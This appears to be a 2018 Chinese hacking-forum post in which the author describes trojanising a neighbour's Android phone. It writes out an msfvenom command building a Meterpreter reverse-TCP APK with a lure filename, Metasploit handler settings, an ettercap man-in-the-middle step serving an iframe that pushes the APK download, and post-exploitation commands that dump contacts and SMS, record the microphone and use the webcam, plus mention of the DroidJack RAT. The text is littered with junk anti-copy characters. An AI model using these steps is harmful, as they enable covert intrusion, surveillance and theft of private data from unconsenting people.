找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1829|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, Q; g; m' `+ ` 五、msf+ettercap入侵邻居安卓手机 1 |* g; m2 D! l2 l

2 k5 ?& ^+ R1 S

9 n& z4 S2 S# x1 k 首先启动msf ; C. j8 ?5 Z8 [# y

" @+ ~* J F- V5 C* w

! @6 p' ]% w1 m7 I, K 先用kali生成一个安卓木马,如下命令: ! d" A: F. u0 k ^' M

/ E) }! l% v; K0 S9 o: ^

% T5 @; H+ G8 ] r Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk . B3 N" u0 R! S5 S# S4 V

% m1 p* v. K4 q" p

9 V: P, U+ F9 u; f 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 5 H' R9 z6 p6 i7 z

- x% P3 }; p6 H6 i. V

9 A( R! }& {4 G( F$ i C: t% H 然后进入msf " {# O. G; t( T& D- K1 k

2 ]" K" B: w$ l' O! @3 p

* T4 X$ [9 S- V; x1 [3 \ use exploit/multi/handler ! C) {$ q' f# S

% D+ y5 ], k, k' f2 m# e' q

2 k0 z8 q4 k' Y set payload android/meterpreter/reverse_tcp 6 B+ P; u2 \% V. W5 e$ T

+ W1 H0 ^* @2 ^/ i

% x5 U4 \+ ^( u. U1 B7 x: l& b set LHOST 192.168.0.109 //ipkailiip ( }. y- f: X1 f$ g5 M) e! |

4 ~7 S8 w* }4 i( P; K) e8 M3 ]9 e/ Q

; f T" n, P' ]9 }4 Z3 M set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ! L- U# y) @3 O4 A2 D7 t" ?

' @5 I2 u' O" K7 |

, T4 _+ N+ M0 o; y Exploit & N' Q- t% E3 j% p/ m

0 p! ]' \/ P6 t9 k$ t& G

/ f' `% B/ D, e1 v+ L, K   / k* ]- k! q# i9 _6 a3 Z

% S v% U9 W- V

" V4 q/ Z0 h0 W! X6 j 下面我们开启ettercap -G {, V; `$ v$ ?; t* F* g

9 G" w2 w" @5 b8 K# v$ j) T

! x4 ^3 X" g' B+ K2 s' k7 A 我物理IP : ?; o2 g+ o3 y3 I0 p

4 Q. j, h1 m) W) {, w

Z& _% v7 a n& @& |5 `   & J* v* L6 w7 a% q t0 Q! s

- N! c) b- h& V q, @4 t+ k6 j

4 @( K; \/ D t3 C8 @ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 J2 b2 }. }* z+ |# o! c3 C

5 d& u @: a( K( X u" I& ^# e+ f

* C% @# `* Z: J7 h5 U# o6 F# U 下面我们来设置一下 7 f- C* ]% L7 X3 h$ _

, c# r2 M$ s# h. G5 w

* o# p2 e' Y$ v4 w# N8 o   8 T5 c' G; m; O- |" z0 ?1 ]

' q! W9 i( D6 `6 Z

# x0 @6 `+ z8 e* s9 L9 i 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 2 b! D' m, w+ u) `! j

+ [. c( z; y. o9 B1 {9 n% m, p

, o5 k9 l5 n( p) q. P   6 b) g# B2 u5 g& X

1 C0 w: c: l3 u/ P1 H

. R" Q+ g) A: D* A   8 m0 H% G' V! Z9 p4 p4 p8 Z

+ h" K) S# @# o0 f5 z

2 w9 x6 H: r6 M- [" A   & N* t; [: Q |1 i# f" [

3 p2 F! R- d) U

: B8 O* u" U' Y* K   / Q P3 [7 R& s; H8 U# w

3 R2 j: w6 v& _! u% U5 a

$ N, u9 w3 m0 X- M, P2 k2 ^   : N G4 T9 @. p3 i

8 o% N9 }/ [7 _/ m1 r* F

% }! ~2 Z; N8 e; g' z# J   * T* ^8 m& V) Y2 K$ P

, S* z. I( K7 W1 t: f

( K, k& ~' n ?+ ]   0 l$ {4 Y2 b# G% {% X

5 g! U, ] T+ u0 C$ M: d9 ^8 W

* S* o9 a F" G   6 ]4 ^, V3 L+ Z; o% w, _* l* \1 \

- k0 j, d8 b2 \- @/ B

/ n/ |5 f% U- @5 `. Z   5 y0 p+ }& _; t

* Z U0 r. o- ?3 j5 {5 O

6 S$ e+ O" Y3 |7 e, ~2 G   " y( [* C: c2 K; c4 o

# h& i% `. f1 z8 x

* h# Q, r* b* p: j" z0 F   # }$ ~9 Y& U( R& R' U

4 @# C: I( p4 d% n- _' Q* Z

, `! h a; O" N7 \   ) w" o% b8 B/ O

# x. z& Q* k: U, M: G5 a

4 W2 F& N! G' }   ' s2 Q3 Z, J5 d0 W

4 ^) `- q8 ]5 g$ z

- a% }0 O8 K2 f/ o. W 下面我们开始攻击 ) H2 U9 y: |& L

+ \8 ?6 C, q. q: E) u9 N& E

/ Z: K( p0 i5 A; H6 [ |" L   ! I" [' B: n/ u4 k$ w5 b. n7 ]

7 F% u/ _! X' B, r) q* k A

7 |! |8 ~" {2 X" F   8 J4 u8 @% S5 c

2 H4 ~. c/ ~0 i9 P. K

/ _# C+ s+ H R! P" J. X! H$ D   . l9 r$ G+ P. I

. w9 N+ p" _2 \( R: y

& R, n/ H: s3 B$ \$ j   : i {3 m- a% |2 V& ~# F" A; u( D

/ N; q* k: K9 y6 f

/ j/ R/ G0 _: n4 f( p   * x0 s; }* k1 q: D/ r

( h4 R9 g, Z6 w6 Q9 s- N

( C8 }" ?! e( m+ W$ n1 D9 u 大概过了5分钟多,发现反弹成功了 8 `- H' a r/ w" [

. v+ O" W$ P, s8 v0 G8 N

5 _. {7 ?& I/ ]/ \+ {; s" i* Z& b   8 x2 t9 s& \/ J# _

2 V2 _# q6 W- y+ [1 O6 T

. k+ `$ h% i8 E T. s. [4 W% g6 a, R   ; f- \+ P0 | w+ q. s& S4 _- O

/ c( U) e6 p+ ? U: x

6 O% S6 j; S2 k& l( _+ l% Z   + Q1 t Z! V( F- h1 S4 X

% ?+ F- z) Z6 G; Y

0 m( y4 d7 `0 @, c. E+ b   8 N5 P* p( A1 l/ H5 o$ H1 m

2 @. Q: y/ [9 C& W5 y

0 m- f0 C) ]: [ V7 X5 y. c   ! J6 d2 v; G! D. e/ F t! Z3 Z

3 H: o8 `: m$ d9 g) I) C

5 M( ]. P- C, I% X6 D   ; \! Y1 L. n/ _/ j( C

* G3 J: p7 Q ?

' H0 c: f6 E" T$ P2 j% U   2 Z& i7 x- b5 C- ~0 j6 c0 ~

. I. q) U! j B

6 y6 [% o; f6 e; ` 执行命令 F {- D5 K8 J. G1 H( y9 h

! [$ {) m7 `# m3 ^4 }+ T) f

: b7 Y' G8 `6 j6 n+ S   / y b, S$ _" `8 o1 ?+ {

/ L' Z8 Y: `0 b

; b9 p9 X6 G4 _* @0 N! t dump_contacts    --》这个是导出电话 $ u! A! Y% f [, U% \) F+ v

/ C7 p0 q) F8 C8 ?

+ ~' I( r S4 ]# O! `1 Z2 R dump_sms --》这个是导出信息 9 B% g6 B; b( j8 h+ m

0 a4 T5 M. O" ^- R7 ^9 t$ T, K

" P, ?+ P3 P5 ]4 x record_mic     Record audio from the default microphone for X seconds , t) Z! w% M9 O/ x

. |3 r* p H2 J$ \7 Y' y

/ \3 t `0 Z: h) _) h- n4 x     webcam_chat    Start a video chat 2 D7 K5 t3 w# O/ a/ B0 s5 D4 y

, m d- B7 u8 ?* a: ~

/ g$ c4 g" w: Q" S S9 {     webcam_list    List webcams 2 @# U. n$ Q) T7 Y/ A

7 ~, U3 s) w( k8 p1 ]+ N

, \ f M+ z" G8 [' P7 _     webcam_snap    Take a snapshot from the specified webcam 3 r* b( ^$ C. x6 j

/ a6 F, r8 Z* T( b# g" e( l

( w& Q: |& R9 l* P- w6 b | webcam_stream  lay a video stream from the specified webcam ' c3 I% `/ ^2 }

]! A: k+ k3 {; h* ^& M

3 p, W& Q$ X- K+ ^! ]$ h& p/ p   " s" u$ B. J+ f: d7 Z# F

! a, L' e* M# g: p- X

: g8 r3 L8 C# b! d' ? C3 l   ( o. I- G1 u) V! Z! p# B- O8 N

M3 y. N M& t, u

9 k4 M- w" L( y 我们打开看一下电话薄, / m1 i$ W2 K6 X5 O+ [

8 T& t5 w, L: ?

Z5 k, F3 o2 [+ e+ z4 [   # B3 a6 U. J- P& C9 i

/ |/ H, H% v1 \' |9 z9 c

7 N. d0 S8 G F' Z7 I& H   ( I+ i. m2 o% K

3 N4 I) G7 A# D

: r0 s" k R( v: U4 _   " M0 l6 q p) }& v

$ M, f V- d3 B2 k7 b/ I

1 a+ g! b. y" L0 V   " w* h; O7 _( d& n

- G, ~0 Y7 c' G3 [

( w9 i" G. a, h* i   $ k0 J; v9 x$ l, g7 [# f

: S" Z. I/ A$ k

, ?3 a) P5 U `# [1 f   $ T+ w! V1 O% i" }

% d: ?- i; L5 F8 U! z: }- N

4 k" R N+ r- y* N 我们同时欺骗成DroidJack木马,使用方法如图: 4 h) u# B3 x# {4 w; W

! C" `, [0 D1 r7 T! V8 [

8 a& I, [0 m1 q9 W   - q) {1 @) u/ S2 |3 T5 S

k( \* b$ s, `

3 R8 K( b4 C- _   4 o: v- @2 ~+ C

" w* h+ Z( q% U+ `* ~

, u4 @) h" Y- i+ w% F) G   5 _# c, n6 r$ `1 x; s

7 w1 y3 Z" }0 D6 P

! |5 S/ e4 a: p s; z' x1 e 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 z3 N1 R2 D$ ?

( i! [* u+ F. q& X0 m4 j @

3 |4 t3 n; h' p5 W( U( L   ) X; ~9 h3 _9 ]8 r1 z2 t( Z, Q

4 n6 s! D* h3 N! c

+ w& K8 i& s1 N4 X: `   / i- ^) w5 ]! I- _' _) ^1 Q

0 m* H5 Z$ `/ E+ ?+ U

& ?$ v A+ i: ~# ^) H7 G% W% _5 t6 }   4 ^1 f5 g8 P2 G

1 w5 W- P+ f- x/ \

5 u6 x) J1 u# [4 J " P) K, V% J! g4 Z i

* O9 O( K9 L" {0 v! v! r' ~* _

2 B3 G( P8 _5 P) V
3 Q+ j9 e$ K, B' o

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表